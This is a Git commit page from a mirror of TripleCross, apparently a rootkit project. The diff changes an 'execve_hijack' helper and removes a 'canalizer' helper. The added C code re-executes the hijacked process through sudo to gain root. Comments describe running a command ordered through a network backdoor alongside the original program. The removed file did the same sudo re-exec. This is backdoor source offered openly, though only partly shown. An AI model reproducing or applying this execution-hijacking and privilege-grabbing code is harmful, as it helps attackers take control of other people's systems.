admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-24 18:33:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

Browse Source
This commit is contained in:
h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
src/helpers/Makefile
View File

@@ -3,13 +3,7 @@ HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make execve_hijack execve_hijack_canalizer
execve_hijack_canalizer.o: execve_hijack_canalizer.c
gcc -c execve_hijack_canalizer.c
execve_hijack_canalizer: execve_hijack_canalizer.o
gcc -o execve_hijack_canalizer execve_hijack_canalizer.o
make execve_hijack
execve_hijack.o: execve_hijack.c $(HEADERS)
gcc -c execve_hijack.c
@@ -19,6 +13,4 @@ execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o
-rm -f execve_hijack
-rm -f execve_hijack_canalizer.o
-rm -f execve_hijack_canalizer
-rm -f execve_hijack

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

20
src/helpers/execve_hijack.c
View File

@@ -64,8 +64,22 @@ char* getLocalIpAddress(){
return IPbuffer;
}
int main(int argc, char* argv[]){
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from execve hijacker\n");
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = "sudo";
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
execve("/usr/bin/sudo", args, envp);
}
time_t rawtime;
struct tm * timeinfo;
@@ -74,10 +88,6 @@ int main(int argc, char* argv[]){
timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo);
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
//We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id()

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.

BIN
src/helpers/execve_hijack_canalizer
View File

Binary file not shown.

11
src/helpers/execve_hijack_canalizer.c
View File

@@ -1,11 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from the canalizer\n");
char* args[] = {"sudo", "/home/osboxes/TFG/src/helpers/execve_hijack", NULL};
execve("/usr/bin/sudo", args, envp);
return 0;
}

BIN
src/helpers/execve_hijack_canalizer.o
View File

Binary file not shown.